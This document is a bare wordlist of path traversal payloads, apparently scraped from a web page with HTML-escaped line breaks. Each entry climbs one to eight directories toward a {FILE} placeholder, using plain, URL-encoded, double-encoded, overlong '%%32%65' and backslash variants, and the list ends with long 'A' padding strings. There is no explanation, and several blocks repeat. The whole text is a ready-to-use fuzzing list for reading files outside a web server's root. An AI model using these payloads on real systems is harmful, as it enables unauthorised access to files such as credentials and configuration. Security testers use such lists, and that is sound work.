%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
